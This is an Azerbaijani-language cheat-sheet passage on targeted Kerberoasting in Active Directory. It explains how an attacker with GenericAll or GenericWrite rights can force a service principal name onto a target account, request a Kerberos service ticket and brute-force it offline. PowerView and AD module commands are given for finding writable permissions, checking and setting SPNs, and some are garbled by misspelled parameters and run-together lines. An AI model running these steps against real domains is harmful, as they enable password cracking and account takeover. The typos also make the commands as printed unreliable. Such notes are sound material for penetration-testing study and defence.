SPN Service Principal Name üçün qısaldılmışdır. O, Active Directory mühitində hesaba və ya xidmətə unikal şəxsiyyət vermək üçün istifadə edilən identifikatordur. SPN-lər çox vaxt Kerberos autentifikasiya protokolu ilə əlaqələndirilir.
SPN-dən necə istifadə edə bilərik?
Kifayət qədər icazələrimiz varsa (GenericAll/GenericWrite) biz hədəf hesaba SPN təyin edə, TGS tələb edə, sonra onun blobunu tutub bruteforce edə bilərik.
PowerView
#Hesablarda maraqlı icazələri yoxlayın:Invoke-ACLScanner-ResolveGUIDs |?{$_.IdentinyReferenceName-match"RDPUsers"}#Cari istifadəçinin artıq bir SPN təyin edib-etmədiyini yoxlayınGet-DomainUser-Identity <UserName>| select serviceprincipalname#Hesabda SPN təyin etməyə məcbur edin:Set-DomainObject<UserName>-Set @{serviceprincipalname='ops/whatever1'}
AD Module:
#Cari istifadəçinin artıq bir SPN təyin edib-etmədiyini yoxlayınGet-ADUser-Identity <UserName>-Properties ServicePrincipalName | select ServicePrincipalName#Hesabda SPN təyin etməyə məcbur edin:Set-ADUser-Identiny <UserName>-ServicePrincipalNames @{Add='ops/whatever1'}
